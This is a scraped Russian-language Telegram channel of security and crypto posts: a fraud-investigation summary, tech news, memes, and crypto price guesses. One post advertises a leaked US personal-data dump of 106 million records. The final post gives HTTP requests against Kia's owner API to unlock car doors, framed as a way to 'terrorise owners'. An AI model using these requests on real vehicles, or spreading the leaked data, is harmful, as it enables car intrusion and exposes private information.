папкин ИБшник, мамкин хацкер
55 subscribers
776 photos
78 videos
19 files
244 links
Круглосуточный уголок shit-постинга на темы около DevSecOps, Reverse-Enginnering, NetDiscovery, DataMining. Ну и конечно же мемесы.
Download Telegram
zachxbt.pdf
2.4 MB
йо.

Достаточно веселая PDFка содержит расследование о том, как группа мошенников, включая Greavys (Малон Лам), Wiz (Вир Четал) и Box (Жандиэль Серрано), украла 243 миллиона долларов у одного человека в результате сложной социальной инженерии.

Основные моменты:
- Методы атаки: Мошенники использовали подмену номера, выдавая себя за поддержку Google и Gemini, чтобы получить доступ к личным аккаунтам жертвы. Они убедили жертву сбросить двухфакторную аутентификацию и перевести средства на компрометированный кошелек.

- Трассировка средств: После кражи 243 миллиона долларов средства были быстро перераспределены между несколькими участниками и обменами, включая Bitcoin, Litecoin, Ethereum и Monero.

- Аресты: В результате расследования, поддержанного различными организациями, были арестованы Greavys и Box. Более 9 миллионов долларов было заморожено, а часть средств возвращена жертве.

- Детали: Дока также включает информацию о роскошной жизни мошенников после кражи, их социальных сетях и ошибках, которые привели к их идентификации.

Это расследование освещает не только саму кражу, но и методы работы правоохранительных органов в таких случаях.

Оч интересно.
А ты думал твой биток не отследят? (На самом деле да, если запариться)
Гори в аду тот мудак, который придумал писать в критические ошибки ОТМЕНУ ДЕЙСТВИЯ ПОЛЬЗОВАТЕЛЕМ.
Кстати, @tass_agency пишет:
Правительство России поддержало законопроект, который обяжет Apple разрешить установку российского магазина приложений RuStore, а также скачивание отечественных программ, платежи и другие функции. Однако парламентариям предложено доработать документ с учетом замечаний кабмина.

Посмотрим на то, что будет делать Apple, так как формально они соблюдают требования РФ.
😎
Please open Telegram to view this post
VIEW IN TELEGRAM
Просто оставлю это здесь.
Forwarded from vx-underground
We aren't surprised, we're surprised it took this long. Pavel Durov is a citizen of France, a NATO country.
Forwarded from Ньюсач/Двач
This media is not supported in your browser
VIEW IN TELEGRAM
Залезли полицейские в подвал, а там дагестанцы крипту майнят: владельцы майнинг-ферм в Дагестане начали устанавливать аппараты для незаконной добычи криптовалюты под землёй

Владельцы установки разместили под землёй более 15 аппаратов, сообщили в правоохранительных органах.
🗑 Наблюдаю картину уже третий месяц как колбасит крипту. Но заметил интересные приколы.

Включаю крипто-жабу 🤵, октябрь будет таким:
6-9 числа эфир снова рухнет до 198-208к,
20-23 числах поднимется до 248-256к.

Если это будет так - это будет забавно.
Обязательно отпишусь об этом.

Achtung:
Играть на этом - не советую. Сказанное не является инвестиционной рекомендацией.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пекарня
Кроме кота по кличке «Хуй» в титрах Space Marine 2 заметили другие «необычные» имена питомцев разработчиков. Среди них:

🔴Еблуша
🔴Мусорка
🔴Кошка номер три

Разбираем
Please open Telegram to view this post
VIEW IN TELEGRAM
UltraAV (((totally not an Kaspersky sideware))) site be like:
ШТИРЛЕЦ ДАВНО НЕ БЫЛ ТАК БЛИЗКО К ПРОВАЛУ

(pango.co официально владелец большинства популярных VPN серверов, таких как UltaVPN, VPN360, BetterNet, OVPN, COSMOVPN, а так же UltraAV :DDDD)
1
USA dream life:
MC2DATA, USA, 106млн уникальных, 2 ТБ

Графы содержат:
• Полное имя
• Возраст
• Домашний адрес
• Электронную почту
• IP-адрес
• Номер телефона
• Платёжную информацию
• Юридические документы
• Зашифрованные пароли
• Трудовой стаж
• Данные семьи, родственников и соседей
Hamster - $0.0000000016, как дела?
Ключик Киа получить просто:
POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;


Делаем реквест к открытию двери:
GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecc1a19-aefd-4188-a7fe-1723e1663d6e



Получаем ВИНуид.
Терроризируем владельцев.

Список попавших с 2025 модельного по 2018:

https://samcurry.net/hacking-kia

Там же подробные инструкции атаки.